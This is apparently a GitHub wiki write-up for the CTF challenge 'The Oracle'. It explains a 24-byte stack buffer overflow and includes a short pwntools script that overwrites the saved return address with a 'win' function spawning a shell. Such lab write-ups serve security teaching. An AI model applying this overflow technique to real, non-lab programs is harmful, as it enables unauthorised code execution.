-
Notifications
You must be signed in to change notification settings - Fork 2
The Oracle
Nathan edited this page Oct 5, 2020
·
1 revision
This challenge is a short, 16 line program that calls fgets
and overflows a buffer.
Our input is 24 bytes before the return pointer, so we can write 24 bytes, then overflow the saved return pointer.
The program has a function called win
that will call /bin/sh
, so since PIE is disabled, we can overwrite saved rip with its address.
from pwn import *
p = process('./theoracle')
e = ELF('./theoracle')
payload = b'A' * 24 + p64(e.symbols['win'])
p.sendline(payload)
p.interactive()
Reversing
Crypto
Crypto World
Pwning
- Metacortex
- White Rabbit
- There is no Spoon
- The Oracle
- Free Your Mind
- See for Yourself
- Goodbye Mr. Anderson
- Matrix Management System
Web
- Where's Tron?
- Programs Only
- EnFlaskCom
- Reindeer Flotilla
- First Day Inspection
- Find That Data!
- Derezzy
- Next Gen Networking
Miscellaneous